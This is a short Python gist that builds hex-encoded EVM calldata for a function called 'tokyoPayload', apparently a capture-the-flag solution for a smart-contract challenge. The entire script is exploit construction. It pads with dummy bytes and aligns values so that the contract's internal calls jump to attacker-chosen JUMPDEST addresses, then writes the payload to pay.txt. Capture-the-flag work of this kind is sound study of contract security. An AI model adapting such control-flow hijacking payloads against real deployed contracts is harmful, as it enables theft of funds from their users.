@kangsangsoo
Created September 22, 2023 07:32
JUMPDEST_RET_FUNCS = "018f"
JUMPDEST_LOAD = "d0"
DUMMY = "DE"
SIG_tokyoPayload = "000040c3"
payload = SIG_tokyoPayload # func sig
payload += "7b".rjust(64, "0") # x
payload += JUMPDEST_LOAD.rjust(64, "0") # y => first call pointer and second call addr
payload += DUMMY * 1 # align
payload += DUMMY * (int(JUMPDEST_RET_FUNCS, 16) - len(payload) // 2)
payload += "11".rjust(64, "0")
payload += "22".rjust(64, "0") # third call
payload += "33".rjust(64, "0") # second call's arg0
payload += DUMMY * ((int(JUMPDEST_LOAD, 16)) * 0x20 - len(payload) // 2 + 5)
assert len(payload) // 2 == int(JUMPDEST_LOAD, 16) * 0x20 + 5
payload += JUMPDEST_LOAD.rjust(64, "0") # first call addr
# Write the hex-encoded calldata to disk, closing the file handle explicitly
with open("pay.txt", "w") as f:
    f.write(payload)